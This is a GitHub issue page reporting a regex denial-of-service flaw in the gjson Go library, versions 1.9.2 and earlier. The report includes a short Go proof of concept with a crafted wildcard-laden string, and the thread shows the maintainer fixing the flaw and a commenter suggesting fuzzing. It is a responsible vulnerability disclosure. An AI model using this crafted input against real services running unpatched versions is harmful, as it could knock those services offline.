Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

gjson.Get can cause DoS attacks. GJSON <= 1.9.2 allows attackers to cause a redos via crafted JSON input. #237

Closed
cmdrgh opened this issue Oct 8, 2021 · 2 comments
Closed

gjson.Get can cause DoS attacks. GJSON <= 1.9.2 allows attackers to cause a redos via crafted JSON input. #237

cmdrgh opened this issue Oct 8, 2021 · 2 comments

Comments

@cmdrgh
Copy link

cmdrgh commented Oct 8, 2021

func main() {
testJson := #[%"*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,,,,,,""*,*"]
gjson.Get(testJson, testJson)
}
@tidwall
Copy link
Owner

tidwall commented Oct 8, 2021

Fixed in 77a57fd
Thanks for reporting.

@tidwall tidwall closed this as completed Oct 8, 2021
This was referenced Jan 12, 2022
Open
Closed
Closed
This was referenced Jan 25, 2022
Closed
Closed
@mend-bolt-for-github mend-bolt-for-github bot mentioned this issue Mar 25, 2022
Closed
@mend-bolt-for-github mend-bolt-for-github bot mentioned this issue May 30, 2022
Closed
@AdamKorcz
Copy link

@tidwall This is something that would be caught by fuzzing gjson continuously: google/oss-fuzz#6901

# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@tidwall @cmdrgh @AdamKorcz